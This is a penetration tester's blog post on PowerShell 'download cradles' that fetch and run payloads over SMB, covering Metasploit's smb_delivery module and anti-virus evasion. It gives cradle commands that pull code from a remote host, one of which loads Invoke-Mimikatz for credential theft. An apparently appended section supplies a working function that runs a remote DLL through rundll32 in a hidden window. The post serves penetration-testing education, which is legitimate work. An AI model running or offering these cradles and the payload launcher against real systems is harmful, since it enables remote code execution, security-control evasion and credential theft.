PowerShell SMB Delivery
By Russel Van Tuyl
The PowerShell IEX "Download Cradle" is one of the top techniques I leverage when I have the ability to execute code on a host. That code execution typically comes from something like PsExec.exe with recovered credentials, a successful SMB relay attack, a malicious macro, or the payload of a Java deserialization attack.
The Download Cradle leverages the PowerShell Invoke-Expression cmdlet, which "Runs commands or expressions on the local computer." The shorthand alias for Invoke-Expression is IEX. The cradle creates a new .NET Framework WebClient object, calls its DownloadString method to fetch a resource as a string, and hands that string to IEX to execute. DownloadString takes a Uniform Resource Identifier (URI) as input.
It is important to note that a URI is a string that identifies a resource. A Uniform Resource Locator (URL) is the subset of URIs that also says where the resource lives and how to reach it: a scheme (the protocol), a host, and a path. A good example of a URL is https://www.swordshield.com/blog/. The resource can be found in the blog directory on the host www.swordshield.com using the HTTPS protocol.
The DownloadString method is typically given a URL, one kind of URI, to download a PowerShell script straight into memory; this avoids writing a file to disk and helps evade anti-virus. An example would be to download the Invoke-Mimikatz script from the PowerSploit project and execute it with a command like this (the raw URL of the script goes in the quotes):
IEX (New-Object Net.WebClient).DownloadString('<URL of Invoke-Mimikatz.ps1>'); Invoke-Mimikatz
This Download Cradle is extremely valuable and is used in tools such as Metasploit and Empire. The exploit/multi/script/web_delivery module can deliver a Meterpreter agent to a target by giving the user the Download Cradle code to execute on that target. After the module has been configured and run, the Download Cradle is printed to the screen. Copy this code and run it on a host, and a Meterpreter agent will be delivered.
During a recent assessment I was having some problems with the Download Cradle. Every cradle I generated, whether created manually or with Metasploit, failed to execute on the host. I was able to execute commands on the host, but when I executed the Download Cradle it never completed successfully. Now might be a good time to note that all of the tools and tutorials I have seen to date use a URL with the Download Cradle. I was growing suspicious that the target host was running some type of anti-virus product that was also doing HTTP(S) inspection, something like a host-based web proxy.
I decided to take advantage of the fact that the DownloadString method takes a URI as input. I manually stood up an SMB share on my Kali Linux box and placed the payload file on the share. In addition to a URL, the DownloadString method will also accept a Universal Naming Convention (UNC) path such as \\192.168.56.1\FileShare: .NET parses a UNC path as a file:// URI, so WebClient reads it over SMB instead of HTTP. I then executed the Download Cradle using a UNC path like:
IEX (New-Object Net.WebClient).DownloadString("\\192.168.1.145\data\Invoke-Mimikatz.ps1");Invoke-Mimikatz
Sure enough, delivering the payload over SMB worked and I no longer had trouble getting the commands to complete. Standing up the SMB server manually was a little tedious, but not too bad overall. I wanted to make the process quicker so that I could just configure a module like the Metasploit Web Delivery module. What better way than to talk with Sword & Shield Security Analyst Andrew Smith, one of the authors of the Web Delivery module. Andrew quickly whipped up an SMB Delivery module (exploit/windows/smb/smb_delivery) that can be used when the HTTP(S) protocol isn't working with the Download Cradle. The module has been published and is available in the current version of Metasploit. Here is a screenshot of the new smb_delivery module.
Like most Metasploit modules, it needs to be configured before it is run. All of the settings are pretty straightforward. Note that Andrew built the module to support two target types: DLL and PSH. The first scenario covers the PSH (PowerShell) target. Below is an example configuration:
Now that the module is configured, it just needs to be run. Once it has been executed, it outputs the Download Cradle code that needs to be executed on your target host.
Alternatively, the module can be configured to execute a Windows Dynamic Link Library (DLL) file from the SMB share using the rundll32.exe program. To generate a DLL file, change the target to 0 and rename the file (a .dll name instead of .ps1).
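As an added example (not code from the original post or from the Metasploit module), the function below runs a DLL straight from the SMB share with rundll32.exe, the way the module's DLL target does, and checks that the share is reachable first, since an unreachable UNC path otherwise only produces a rundll32 error pop-up on the target. The share \\192.168.1.145\data and the file name payload.dll are assumptions.

```powershell
# Added example, not from the original post. The share and DLL name are assumptions.

function Invoke-SmbDll {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$true)]
        [string]$UncDllPath,          # e.g. \\192.168.1.145\data\payload.dll (assumed)
        [string]$EntryPoint = '0'     # rundll32 calls LoadLibrary on the DLL before it
                                      # looks up this export, so DllMain runs even when
                                      # no export by this name exists
    )
    # Confirm the share answers over SMB before handing the path to rundll32.
    if (-not (Test-Path -LiteralPath $UncDllPath)) {
        throw "Share path not reachable: $UncDllPath (is the SMB server up and port 445 open?)"
    }
    # rundll32 takes "<dll>,<entry point>" as a single argument.
    $arg = '{0},{1}' -f $UncDllPath, $EntryPoint
    Write-Verbose "Running: rundll32.exe $arg"
    Start-Process -FilePath "$env:SystemRoot\System32\rundll32.exe" `
                  -ArgumentList $arg -WindowStyle Hidden
}

Invoke-SmbDll -UncDllPath '\\192.168.1.145\data\payload.dll' -Verbose
```

The Test-Path check doubles as a quick diagnostic: if it fails while the PowerShell cradle over the same share works, the DLL was not placed on the share (or was not renamed), not the SMB transport.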
My next question is, what other URIs can be used with this Download Cradle? How many companies have an SMB proxy or inspect SMB traffic?
Russel Van Tuyl is a security analyst for Sword & Shield Enterprise Security. His primary role is conducting network vulnerability assessments and penetration tests, but he also performs web application assessments, firewall configuration audits, wireless assessments, and social engineering.
He has more than 10 years of experience in the technical field in roles such as database design, field device support, help desk, IT asset management, programming, and information security.